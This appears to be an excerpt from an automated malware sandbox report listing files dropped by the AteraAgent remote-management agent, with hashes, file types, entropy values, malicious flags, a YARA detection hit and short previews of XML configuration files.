                                                                                                                                                                                                                                        SHA-256:D24366C19E9DFE77B7EA94546F336F20CF8F574F838F68EBB2179C6CBFE4F25A
                                                                                                                                                                                                                                        SHA-512:5AC38F55D0045BFDB9951154E87ED30E98B200C148897E7BD3C19BEFDA634437A1EC5AA2088CE99F0E17644069EEA93E97AE1DA00DB5746C4784228FE35E1725
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3207427
                                                                                                                                                                                                                                        Entropy (8bit):7.999886786110029
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:Ybr4+uFjbIPqW9rXP79t0lkGdDrEzz1+2iUPyW5GR9eSjYLKfbrLdo4xQOy2U43I:Y9u1GqWDt0lkYv/2OaG265rLSOHpjAeY
                                                                                                                                                                                                                                        MD5:3DB366E996EAE1F8DD3F01BF9172C9EA
                                                                                                                                                                                                                                        SHA1:34F2FC320F7B699B917BEBC82FE90DE8DE24BFBD
                                                                                                                                                                                                                                        SHA-256:907988CAD71E5E2702BF061EAD1AC33B63E90E7C1723198EC5A743EDAD99370C
                                                                                                                                                                                                                                        SHA-512:BA2FB12A3B6877220B44EE5891D20AB0A0736A3E1C79CE16F1EC12879627185DFA7DBE81AA8FF873F47EA3D825EA9FE5BEC7894E1E4795BEC1ADCB68BE7D5550
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33328
                                                                                                                                                                                                                                        Entropy (8bit):6.281012266252755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1Kj5tGG8qWsAWikfoG75yd1pjWpO6sRjBMlYXeNyb8E9VF6IYinAM+oCTIRG:Q18PlFAmaCNByYXmEpYinAMxCB
                                                                                                                                                                                                                                        MD5:B39264220D20A5C2807CDA3EA5F6B772
                                                                                                                                                                                                                                        SHA1:297845D96849058DC3216117FB6BB85CFA2DD168
                                                                                                                                                                                                                                        SHA-256:2B7C0ABDC32E7D8892A86EAF3E5E5183AE1601CE27518654F70B6EDF737AE2C1
                                                                                                                                                                                                                                        SHA-512:E715F165806FF0DF1C33397BC778890322C65E22DD42D8922F693461DE5407AB5C7D9C38709852DBF3A6E09756C0F88D2AFEA5AD847DD1A00737ECE4DE57AF21
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1062
                                                                                                                                                                                                                                        Entropy (8bit):5.04288182607063
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/F9y:3sIk7O7RgdjdgFSagFw
                                                                                                                                                                                                                                        MD5:D82D26318224097C2B13F43E879DA855
                                                                                                                                                                                                                                        SHA1:4626369E38B4505371D1376FB9A50B401B21A7E3
                                                                                                                                                                                                                                        SHA-256:1BE14A97E8F1FFC962C060B76FFAC47298D02680F235097CABF378EDB3EA34D6
                                                                                                                                                                                                                                        SHA-512:5E3B09D12E5FEFB6B82DB7E19A3D856D02C683B211F18CEBABC0A6FBEA9B3E84BCFAF414C7DF043F986F78A85DB8A22D4584DCAEBE59CDC0A527D7636B31886A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXck:WB7
                                                                                                                                                                                                                                        MD5:4285039ACC7EF979D91D2FE67A56D947
                                                                                                                                                                                                                                        SHA1:4FC20A3600872C14EE506013057CCE226B5BE03B
                                                                                                                                                                                                                                        SHA-256:6781395B6CE9938A1669FDEE0C0A1EFB355D12C7DC78AD0338B90E041AA1B730
                                                                                                                                                                                                                                        SHA-512:801D94822ABF39D4C7CA5A82A2F9DF4E1A1BAF747B27FBA7147FF122C6DC58525C7AE93360109C365A76121DF3C31EEBA37801D101CF3EC44709B3F59527E529
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=29.5
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):99376
                                                                                                                                                                                                                                        Entropy (8bit):6.18918954237505
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:TlAttsLnppOphwrfNIkZP0kLv+ghDBzmItlVYlkL5ihaO40QhflQCxhB7HxL:ToESpOPptPkW5ihaOdQhfhBJ
                                                                                                                                                                                                                                        MD5:ABFC0A3DC178AA77AD97FED20A6B9478
                                                                                                                                                                                                                                        SHA1:16AABB2AD5B0D489856F54E2727B8FB49D08FCAF
                                                                                                                                                                                                                                        SHA-256:FD8D5C84A13272537F4D5D102A4B98AA8CEA9383DE6F1AECC2A2F883BA8B7349
                                                                                                                                                                                                                                        SHA-512:9775C40F97B5AE515B02A0AA311299209BD3299C6183FF2DCA5C05D713BD9E50E4BF051F4512855A0C01F65635475A8A54C303AD4CA2DB498E998D1C6B86EA1A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145456
                                                                                                                                                                                                                                        Entropy (8bit):6.204144467327923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:FRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIh6:b9XeDmzV2yzlhKLFU1lLVp1+2flYFsr
                                                                                                                                                                                                                                        MD5:B63E085823C5D8C6E9A44C7FAD2E0238
                                                                                                                                                                                                                                        SHA1:78A38625C24431CCEC7F047775D84EBE04CC2E48
                                                                                                                                                                                                                                        SHA-256:1E3645669ED8536F57436637B1C2F1F75787B674FC3D78A3916479065EB05D83
                                                                                                                                                                                                                                        SHA-512:E855BB0BC8B6A0CAD4F831AC6516CF81E112C1EF150025B1C3F6D5867CB7E2C51D97F2DB6E2E40A6765AC2CECB0B82B54882AED001579215EFD5DB4AA054236A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29232
                                                                                                                                                                                                                                        Entropy (8bit):6.6747758033899105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lmYaXzmSJL6guJrdvc5tIZmQCaBj4QU3hOTVTDvAGvoOCcdcOFyF61Nyb8E9VF6W:3SJh5tIYQzT5zyF6REpYinAMxCx+R
                                                                                                                                                                                                                                        MD5:1D556B37E30CA94B43504B34B74DA36A
                                                                                                                                                                                                                                        SHA1:71A4165BDDE78F8E639439E9C389C49BCDBB0484
                                                                                                                                                                                                                                        SHA-256:D6D95F59C970D11FBF8C62CECBD92AA7750BBEE92326F8E20558922375484FE3
                                                                                                                                                                                                                                        SHA-512:D992D518A3DE1D1758FBB866397C5847A0DA796A8F6A73F58731A5D91FF3A7BB809C9C601D3D508BD83A33A8B2DC03C985BA7AEB15E4777894BDCA50A097BF01
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):219184
                                                                                                                                                                                                                                        Entropy (8bit):6.063112831528192
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:CYq80gPJle2CpcKyudA1+PVtMG8e7sw9CcHvhln:CYqqbe2CSod5dtM8ww7PL
                                                                                                                                                                                                                                        MD5:A612E23AC94A46014969EC041CCC792D
                                                                                                                                                                                                                                        SHA1:C88D06BD33D2C5A0D83F2770D1EC5210065FB449
                                                                                                                                                                                                                                        SHA-256:50EE396DF8140433A6672663E8BDE4BFA3DDEC71B805F32025B68DCBD9BB56CC
                                                                                                                                                                                                                                        SHA-512:EFCF2423C17F0143A05A8252A3198476DC6EF8235634A84E5C1D0F4FA708E7A89102F5F2D827D1F7AED7D4F400F16EEBEB34FA09F458059F1C13ACB48DDA05F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):302128
                                                                                                                                                                                                                                        Entropy (8bit):7.176568516700616
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:KZVw5mx115y505H0jIfJMSFk9X0jIfJMSFk9y:48wJMykwwJMyky
                                                                                                                                                                                                                                        MD5:C8F6A8A7DE9D011EE1A86791F41B68F9
                                                                                                                                                                                                                                        SHA1:819D2ED9538BA442D5379507C9290F3C02C798DB
                                                                                                                                                                                                                                        SHA-256:0D8E3BA40E08DFB62BE304540F7981A23DF29F0BE6685169DD8ABDAF0528B760
                                                                                                                                                                                                                                        SHA-512:4D7396BF765766C918A36E2AA114DAB2714F9AD4F67BF567ED9B023D9CA6334A94DE7CF6B6B01757151FB4F24BC25F8C25542D3D191878B09C91878675D34E20
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                        Entropy (8bit):5.0141792226861375
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGzNFF7ap+5v5OXrRf/2//FicYo4xT:JduPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:8F6EB9E75E6A6F0C0D58FB697C10CEDF
                                                                                                                                                                                                                                        SHA1:6944935DFDC33E0C6DB26869BF25EDA85A2622D8
                                                                                                                                                                                                                                        SHA-256:E2B8677434501735FB0233ED0CC2FFEE5BF6FB4387C51DBCB2585A70E42E4F08
                                                                                                                                                                                                                                        SHA-512:A946252B2E3705EAE751A2672D4ADE1499ECEB28C48B4BE6150C4201EE20A7B9A4450C75E06B07F5DAA3528041A566931D988FBD0C2EA90240D61008895BA44A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030847171668023
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:O1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7si:hIzm6pOIgvr7n
                                                                                                                                                                                                                                        MD5:D6217A5E6F82915EBFF37849BD12269A
                                                                                                                                                                                                                                        SHA1:3A4419B9D44FA4C8768EA94894BAF6A0C59EB650
                                                                                                                                                                                                                                        SHA-256:E16953B3A27A723D52C3F339F544709ACB60119CD60D39529062A3ED213010DA
                                                                                                                                                                                                                                        SHA-512:4CAA0C4E6EDB6BB142EF250E2839A121D7B801D801A3F7581C2413B51884ED181AF720AC61BEAE55D0292AB1CB1C445BDC687E99B53CDB4510AD7AE03F33B0DA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398896
                                                                                                                                                                                                                                        Entropy (8bit):6.134466395224396
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:OjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvn:O+e55LgIkTmyAAfTnMLvn
                                                                                                                                                                                                                                        MD5:EABC58594323584D1064CFB69C37014D
                                                                                                                                                                                                                                        SHA1:6ADB6F949D9B5367AEF31E43EDCDA2795DC5E1FF
                                                                                                                                                                                                                                        SHA-256:5F425AA23D8677C5D6EA108C0A355347B1284ACC21FA58E24EFEB0FE12E33243
                                                                                                                                                                                                                                        SHA-512:FF021B0F43DEDE6A631659812B416FB0EE9B8D9BDCBD385D3694C104196353B4F2B8F0230228C7E8E96F53EA8B431A5C2BDC8A3BC9DD887F32096495D449B273
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960863921169204
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:xBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUs:xBjk38WuBcAbwoA/BkjSHXP36RMGN
                                                                                                                                                                                                                                        MD5:0BEC53BD867503DF5A269731FD3645ED
                                                                                                                                                                                                                                        SHA1:BF5CD7E2D0AC312CAE9D0E8EF8513EB071D7E8CD
                                                                                                                                                                                                                                        SHA-256:32D998A374835BB2DC8BE8DF44083BFCCFFC385F9CA3088C20DF724D80501E31
                                                                                                                                                                                                                                        SHA-512:3C36FAC30027D1C4135BA0012B0D2B3303BA7471B1E7D3B3FFC973BE73F32691CCC7F2CD8608FB3C972AAF9E06B57C7CC4F8FCFCC96CA7300C79B0C1D4DD2E22
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):154672
                                                                                                                                                                                                                                        Entropy (8bit):5.991266233276983
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:r4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otckZ:r4wZywKn/U5xEwKIk0WV
                                                                                                                                                                                                                                        MD5:944A860674FD5734BD6688AC8AAE9256
                                                                                                                                                                                                                                        SHA1:16B78323C16F5C334DC2D2D389A848BDA81D6A96
                                                                                                                                                                                                                                        SHA-256:B845A1EFA303017440CB3741C5A9B9433186DECBD040902A6BCB7D46C51714FB
                                                                                                                                                                                                                                        SHA-512:E16A3E9734EE2E3473839D2CAED1CF4DA72A3772E8CEF69A30BAF6016FB014EFC1A0237E54D2B5908E1A7744EDDE75ADEDEE060F65A8F1B13E7395424B87850E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.671789886100643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CrMdp9yXOfPfAxR5zwWvYW8avNyb8E9VF6IYinAM+oCA+sg:CrMcXP6gEpYinAMxCP
                                                                                                                                                                                                                                        MD5:20ED3D49A0829801EED1EDAE79544BE1
                                                                                                                                                                                                                                        SHA1:7E0C9D7B6A4D50C3F87A3F2D1062260451C5A5AD
                                                                                                                                                                                                                                        SHA-256:D95B0423D6370B015114984C2E523D7C471233D597D5CFCA29997CF0BE39EC5C
                                                                                                                                                                                                                                        SHA-512:6595B9F28A09C427864746D0FF89F8966485923885DBF333A0569B853B6E7F41E6B6C60CFDC1F5F464CEB6DCD8CF15E9E5C79AD375DB3864F845B92325A4FF56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):420400
                                                                                                                                                                                                                                        Entropy (8bit):6.109526877399236
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:85douWvsWkOfjL/MEd6/7vfA8SCW1nFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFA:8pjblhW1g
                                                                                                                                                                                                                                        MD5:E114DA79F67E8F6B2D486175BFD14AC4
                                                                                                                                                                                                                                        SHA1:13E58B927F07AAC7238819E624027616AE14775A
                                                                                                                                                                                                                                        SHA-256:3ADD177F8DB848879B1CB6700F8A302FCCCDB1CA3DB15B9FEF27E47A84288F26
                                                                                                                                                                                                                                        SHA-512:2C92AA968090BAE35DFB2A52A73EFB69F8846A924C43FA40F5560FB49FE55495E716C265D48E941823D22E1ED1AB8880DBA3A52D5F52CECF819E284941042C46
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):142384
                                                                                                                                                                                                                                        Entropy (8bit):6.161296428539405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:dUGrszKKLBFa9DvrJGeesIf3afNs2AldfIQT:MBFd3/aFs2S
                                                                                                                                                                                                                                        MD5:064C5858F16F91EF621898A23ED7C22D
                                                                                                                                                                                                                                        SHA1:D2B7DB43AB9861D5919F945F152B7A5862E1DD4E
                                                                                                                                                                                                                                        SHA-256:B82F9A7647B4003F847A0817FDCC7031AD34B328FDC1BACBCA6BF86978091BD7
                                                                                                                                                                                                                                        SHA-512:786584A4040B92F556DE5BABC72AD7A94BFCE871C3EA518C226D14D11A5658AC6FDADB550E57D196983DC7CBF13A5EDC942A18C0E9896A7FBD254CEDC05B1101
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):110128
                                                                                                                                                                                                                                        Entropy (8bit):5.512118293006196
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/i7Hx8:PWw0SUUKBM8aOUiiGw7qa9tK/im
                                                                                                                                                                                                                                        MD5:18194884A62938A90047E72CA9EA7B90
                                                                                                                                                                                                                                        SHA1:01DCF254262507C621B9CFFB6517925F89D268B5
                                                                                                                                                                                                                                        SHA-256:3C79FFB1D2BB625E0DD70D95E27F44CEAD5CCC2E0388ED19017D2621FD6DD5C8
                                                                                                                                                                                                                                        SHA-512:F5F2BA9C71C5927314B2C23A969DEC5E0D510EDF79E1D1589651602E721126DBCD93647FCA7CCF205F4AEA6CE1961E3271641B03054AACE14EDA614345DB0AC7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.675580489635893
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeB3xV:zy9eEpYinAMxCA7
                                                                                                                                                                                                                                        MD5:41A5C0401DD6C187B2F6D48BA609593A
                                                                                                                                                                                                                                        SHA1:9898058AFE558B47F32EF3F9C8FE3929F971D572
                                                                                                                                                                                                                                        SHA-256:BEBAC40679E174EB69259875424627070460518C9A234B322DA44CEF3F60E956
                                                                                                                                                                                                                                        SHA-512:EAA66E86F36A2C32BC57CAF76AEB4F784E6E72FB2E6740FC38580785F4CF82435D404E6F4CF1D4062301521343CAA8D6E634203FCC0C0631FAE825ADBB0F3067
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19504
                                                                                                                                                                                                                                        Entropy (8bit):6.5231950705968025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:eryPa16oAL4D+wW9IWmDIW4IWYDcNyb8E9VF6IYinAM+oCFMx:4Ws6oqDjADKeD8EpYinAMxCS
                                                                                                                                                                                                                                        MD5:1953CC01CFE7AC5CCA7F3D3B8358DD14
                                                                                                                                                                                                                                        SHA1:5C1A31E2121096CEC0CC5AB4EE41CE4DD751688E
                                                                                                                                                                                                                                        SHA-256:B48815AFE4CDCB3795427A6C11DC2364B93B655B4AE4DB9B6C6B79FA7A473688
                                                                                                                                                                                                                                        SHA-512:148AED2DA26499FC3A5A98C829357FA0A99C40D18E035783409C529D4ED1F0E98865339DBA4A9EBE04CDAA6328953475156640CF8EE793110E16218D8BE79ED3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41520
                                                                                                                                                                                                                                        Entropy (8bit):6.410235756157491
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:xjfAw5tis37Mkvwtwq6uUQ/B0X5tl9wCVjkz3pVS3Upoztjl2Nyb8E9VF6IYinA2:xks374GX7nwOa5VS2ozdleEpYinAMxC4
                                                                                                                                                                                                                                        MD5:9B0D3892C30CB92562149E969895D9C8
                                                                                                                                                                                                                                        SHA1:B2AB853CFA3BEA350FFD9E3BB66DB914C304FD67
                                                                                                                                                                                                                                        SHA-256:B59FAC976FADEEC80074831FEE74BEBDFAF4BFDB0DE10D15923BAB1436DF3D9A
                                                                                                                                                                                                                                        SHA-512:6D35CB8BAEED39B825E524AE31D27C78F3D5A47C98BE42D2BE6FD3578D1ACA91D0EF2C73FB72569CB73BA3185599545BF082F6E3348FE256F5217E3AF88C3917
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                        Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                        MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                        SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                        SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                        SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
